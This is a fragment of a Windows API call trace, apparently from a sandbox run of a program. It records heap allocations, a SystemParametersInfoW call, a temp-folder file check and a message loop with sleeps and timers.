Size=0x10) returned 0x2e51eb0 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0297.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b48 [0297.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b48, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0297.960] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0297.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0297.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0297.960] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0298.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0298.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0298.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0298.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0298.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0298.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0298.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0298.032] FreeLibrary (hLibModule=0x750c0000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0298.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0298.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0298.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0298.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0298.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0298.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0298.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0298.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0298.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0298.035] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0298.035] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0298.035] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0298.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0298.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0298.035] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0298.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0298.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0298.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0298.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0298.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0298.036] timeGetTime () returned 0x118a8d9 [0298.036] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.036] Sleep (dwMilliseconds=0xa) [0298.107] timeGetTime () returned 0x118a921 [0298.107] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.108] Sleep (dwMilliseconds=0xa) [0298.190] timeGetTime () returned 0x118a973 [0298.190] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.190] Sleep (dwMilliseconds=0xa) [0298.281] timeGetTime () returned 0x118a9ce [0298.281] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.281] Sleep (dwMilliseconds=0xa) [0298.350] timeGetTime () returned 0x118aa13 [0298.350] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.350] Sleep (dwMilliseconds=0xa) [0298.516] timeGetTime () returned 0x118aaba [0298.517] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.517] Sleep (dwMilliseconds=0xa) [0298.586] timeGetTime () returned 0x118aaff [0298.586] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.586] Sleep (dwMilliseconds=0xa) [0298.626] timeGetTime () returned 0x118ab28 [0298.626] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.626] Sleep (dwMilliseconds=0xa) [0298.668] timeGetTime () returned 0x118ab51 [0298.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0298.668] TranslateMessage (lpMsg=0x8cf798) returned 0 [0298.668] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0298.668] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0298.668] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0298.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.668] Sleep (dwMilliseconds=0xa) [0298.734] timeGetTime () returned 0x118ab94 [0298.734] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.734] Sleep (dwMilliseconds=0xa) [0298.778] timeGetTime () returned 0x118abc0 [0298.778] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.778] Sleep (dwMilliseconds=0xa) [0298.828] timeGetTime () returned 0x118abf1 [0298.828] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.828] Sleep (dwMilliseconds=0xa) [0298.862] timeGetTime () returned 0x118ac13 [0298.862] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.862] Sleep (dwMilliseconds=0xa) [0298.897] timeGetTime () returned 0x118ac36 [0298.897] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.897] Sleep (dwMilliseconds=0xa) [0298.936] timeGetTime () returned 0x118ac5d [0298.936] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.936] Sleep (dwMilliseconds=0xa) [0298.971] timeGetTime () returned 0x118ac80 [0298.971] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0298.971] Sleep (dwMilliseconds=0xa) [0299.008] timeGetTime () returned 0x118aca6 [0299.009] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.009] Sleep (dwMilliseconds=0xa) [0299.043] timeGetTime () returned 0x118acc9 [0299.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0299.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0299.044] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0299.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0299.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0299.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0299.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 